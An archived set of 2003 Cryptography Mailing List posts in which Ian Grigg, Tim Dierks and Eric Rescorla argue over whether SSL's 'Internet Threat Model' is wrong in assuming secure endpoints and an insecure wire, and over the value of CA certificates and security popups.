it is telling me that this certificate is bad, and
asking whether me if I am sure I want to do this.

A popup is symonymous with bad news.  It shouldn't be
used for good news.  As a general theme, that is,
although this is the reason I cited that paper:  others
have done work on this and they are a long way ahead
in their thinking, far beyond me.


   It's not THAT different from what
   SSH pops up.
 
 
  (Actually, I'm not sure what SSH pops up, it's
  never popped up anything to me?  Are you talking
  about a windows version?)
 SSH in terminal mode says:
 
 The authenticity of host 'hacker.stanford.edu (171.64.78.90)' can't be established.
 RSA key fingerprint is d3:a8:90:6a:e8:ef:fa:43:18:47:4c:02:ab:06:04:7f.
 Are you sure you want to continue connecting (yes/no)? 
 
 I actually find the Firebird popup vastly more understandable
 and helpful.


I'm not sure I can make much of your point,
as I've never heard of nor seen a Firebird?


iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


WYTM?

2003-10-13 Thread Ian Grigg
As many have decried in recent threads, it all
comes down the WYTM - What's Your Threat Model.

It's hard to come up with anything more important
in crypto.  It's the starting point for ... every-
thing.  This seems increasingly evident because we
haven't successfully reverse-engineered the threat
model for the Quantum crypto stuff, for the Linux
VPN game, and for Tom's qd channel security.

Which results in, at best, a sinking feeling, or
at worst, endless arguments as to whether we are
dealing with yet another a hype cycle, yet another
practically worthless crypto protocol, yet another
newbie leading users on to disaster through belief
in simple, hidden, insecure factors, or...

WYTM?

It's the first question, and I've thought it about
a lot in the context of SSL.  This rant is about
what I've found.  Please excuse the weak cross over!



For $40, you can pick up SSL  TLS by Eric
Rescorla [1].  It's is about as close as I could
get to finding serious commentary on the threat
model for SSL [2].

The threat model is in Section 1.2, and the reader
might like to run through that, in the flesh, here:

  http://www.iang.org/ssl/rescorla_1.html

perhaps for the benefit of at least one unbiased
reading.  Please, read it.  I typed it in by hand,
and my fingers want to know it was worth it [3].

The rest of this rant is about what the Threat
model says, in totally biased, opinionated terms
[4].  My commentary rails on the left, the book
composes centermost.



  1.2  The Internet Threat Model

  Designers of Internet security protocols
  typically share a more or less common
  threat model.  

Eric doesn't say so explicitly, but this is pretty
much the SSL threat model.  Here comes the first
key point:

  First, it's assumed that the actual end
  systems that the protocol is being
  executed on are secure

(And then some testing of that claim.  To round
this out, let's skip to the next paragraph:)

  ... we assume that the attacker has more or
  less complete control of the communications
  channel between any two machines. 



Ladies and Gentlemen, there you have it.  The
Internet Threat Model (ITM), in a nutshell, or,
two nutshells, if we are using those earlier two
sentance models.

It's a strong model:  the end nodes are secure and
the middle is not.  It's clean, it's simple, and
we just happen to have a solution for it.



Problem is, it's also wrong.  The end systems
are not secure, and the comms in the middle is
actually remarkably safe.

(Whoa!  Did he say that?)  Yep, I surely did: the
systems are insecure, and, the wire is safe.

Let's quantify that:  Windows.  Is most of the
end systems (and we don't need to belabour that
point).  Are infected with viruses, hacks, macros,
configuration tools, passwords, Norton recovery
tools, my kid sister...

And then there's Linux.  13,000 boxen hacked per
month... [5].  In fact, Linux beats Windows 4 to 1
and it hasn't even challenged the user's desktop
market yet!

It shows in the statistics, it shows in experience;
pretty much all of us have seen a cracked box at
close quarters at one point or another [6].

Windows systems are perverted in their millions by
worms, viruses, and other upgrades to the social
networking infrastructure.  Linux systems aren't
much more trust-inspiring, on the face of it.

Pretty much all of us present in this forum would
feel fairly confident about downloading some sort
of crack disc, walking into a public library and
taking over one of their machines.

Mind you... in that same library, could we walk
in and start listening to each other's comms?

Nope.  Probably not.

On the one hand, we'd have trouble on the cables,
without being spotted by that pesky librarian.
And those darn $100 switches, they so ruin the
party these days.

Admittedly, OTOH, we do have that wonderful 802.11b
stuff and there we can really listen in [7].

But, in practice, we can conclude, nobody much
listens to our traffic.  Really, so close to nobody
that nobody in reality worries about it [8].

But, every sumbitch is trying to hack into our
machine, everyone has a virus scanner, a firewall,
etc etc.  I'm sure we've all shared that wierd
feeling when we install a new firewall that
notifies when your machine is being port scanned?
A new machine can be put on a totally new IP, and
almost immediately, ports are being scanned

How do they do that so fast?



Hence the point:  the comms is pretty darn safe.
And the node is in trouble.  We might have trouble
measuring it, but we can assert this fact:

the node is way more insecure than the comms.

That's a good enough assumption for now;  which
takes us back to the so-called Internet Threat
Model and by extension and assumption, the SSL
threat model:

the actual end systems ... are secure.
  the attacker has more or less complete
 control of the communications channel between
 any two machines.

Quite the reverse pertains [5].  So where does

Re: WYTM?

2003-10-13 Thread Ian Grigg
Minor errata:

Eric Rescorla wrote:
  I totally agree that the systems are
 insecure (obligatory pitch for my Internet is Too
 Secure Already) http://www.rtfm.com/TooSecure.pdf,

I found this link had moved to here;

http://www.rtfm.com/TooSecure-usenix.pdf

 which makes some of the same points you're making,
 though not all.

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-13 Thread Tim Dierks
At 12:28 AM 10/13/2003, Ian Grigg wrote:
Problem is, it's also wrong.  The end systems
are not secure, and the comms in the middle is
actually remarkably safe.
I think this is an interesting, insightful analysis, but I also think it's 
drawing a stronger contrast between the real world and the Internet threat 
model than is warranted.

It's true that a large number of machines are compromised, but they were 
generally compromised by malicious communications that came over the 
network. If correctly implemented systems had protected these machines from 
untrustworthy Internet data, they wouldn't have been compromised.

Similarly, the statement is true at large (many systems are compromised), 
but not necessarily true in the small (I'm fairly confident that my SSL 
endpoints are not compromised). This means that the threat model is valid 
for individuals who take care to make sure that they comply with its 
assumptions, even if it may be less valid for the Internet at large.

And it's true that we define the threat model to be as large as the problem 
we know how to solve: we protect against the things we know how to protect 
against, and don't address problems at this level that we don't know how to 
protect against at this level. This is no more incorrect than my buying 
clothes which will protect me from rain, but failing to consider shopping 
for clothes which will do a good job of protecting me from a nuclear blast: 
we don't know how to make such clothes, so we don't bother thinking about 
that risk in that environment. Similarly, we have no idea how to design a 
networking protocol to protect us from the endpoints having already been 
compromised, so we don't worry about that part of the problem in that 
space. Perhaps we worry about it in another space (firewalls, better OS 
coding, TCPA, passing laws).

So, I disagree: I don't think that the SSL model is wrong: it's the right 
model for the component of the full problem it looks to address. And I 
don't think that the Internet threat model has failed to address the 
problem of host compromise: the fact is that these host compromises 
resulted, in part, from the failure of operating systems and other software 
to adequately protect against threats described in the Internet threat 
model: namely, that data coming in over the network cannot be trusted.

That doesn't change the fact that we should worry about the risk in 
practice that those assumptions of endpoint security will not hold.

 - Tim

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-13 Thread Ian Grigg
Eric,

thanks for your reply!

My point is strictly limited to something
approximating there was no threat model
for SSL / secure browsing.  And, as you
say, you don't really disagree with that
100% :-)

With that in mind, I think we agree on this:


  [9] I'd love to hear the inside scoop, but all I
  have is Eric's book.  Oh, and for the record,
  Eric wasn't anywhere near this game when it was
  all being cast out in concrete.  He's just the
  historian on this one.  Or, that's the way I
  understand it.
 
 Actually, I was there, though I was an outsider to the
 process. Netscape was doing the design and not taking much
 input. However, they did send copies to a few people and one
 of them was my colleague Allan Schiffman, so I saw it.

OK!

 It's really a mistake to think of SSL as being designed
 with an explicit threat model. That just wasn't how the
 designers at Netscape thought, as far as I can tell.


Well, that's the sort of confirmation I'm looking
for.  From the documents and everything, it seems
as though the threat model wasn't analysed, it was
just picked out of a book somewhere.  Or, as you
say, even that is too kind, they simply didn't
think that way.

But, this is a very important point.  It means that
when we talk about secure browsing, it is wrong to
defend it on the basis of the threat model.  There
was no threat model.  What we have is an accident
of the past.

Which is great.  This means there is no real objection
to building a real threat model.  One more appropriate
to the times, the people, the applications, the needs.

And the today-threats.  Not the bogeyman threats.


 Incidentally, Ian, I'd like to propose a counterargument
 to your argument. It's true that most web traffic
 could be encrypted if we had a more opportunistic key
 exchange system. But if there isn't any substantial
 sniffing (i.e. the wire is secure) then who cares?


Exactly.  Why do I care?  Why do you care?

It is mantra in the SSL community and in the
browsing world that we do care.  That's why
the software is arranged in a a double lock-
in, between the server and the browser, to
force use of a CA cert.

So, if we don't care, why do we care?  What
is the reason for doing this?  Why are we
paying to use free software?  What paycheck
does Ben draw from all our money being spent
on this i don't care thing called a cert?

Some people say because of the threat model.

And that's what this thread is about:  we
agree that there is no threat model, in any
proper sense.  So this is a null and void
answer.

Other people say to protect against MITM.
But, as we've discussed at length, there is
little or no real or measurable threat of MITM.

Yet others say to be sure we are talking
to the merchant.  Sorry, that's not a good
answer either because in my email box today
there are about 10 different attacks on the
secure sites that I care about.  And mostly,
they don't care about ... certs.  But they
care enough to keep doing it.  Why is that?



Someone made a judgement call, 9 or so years
ago, and we're still paying for that person
caring on our behalf, erroneously.

Let's not care anymore.  Let's stop paying.

I don't care who it was, even.  I just want
to stop paying for his person, caring for me.

Let's start making our own security choices?

Let crypto run free!

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]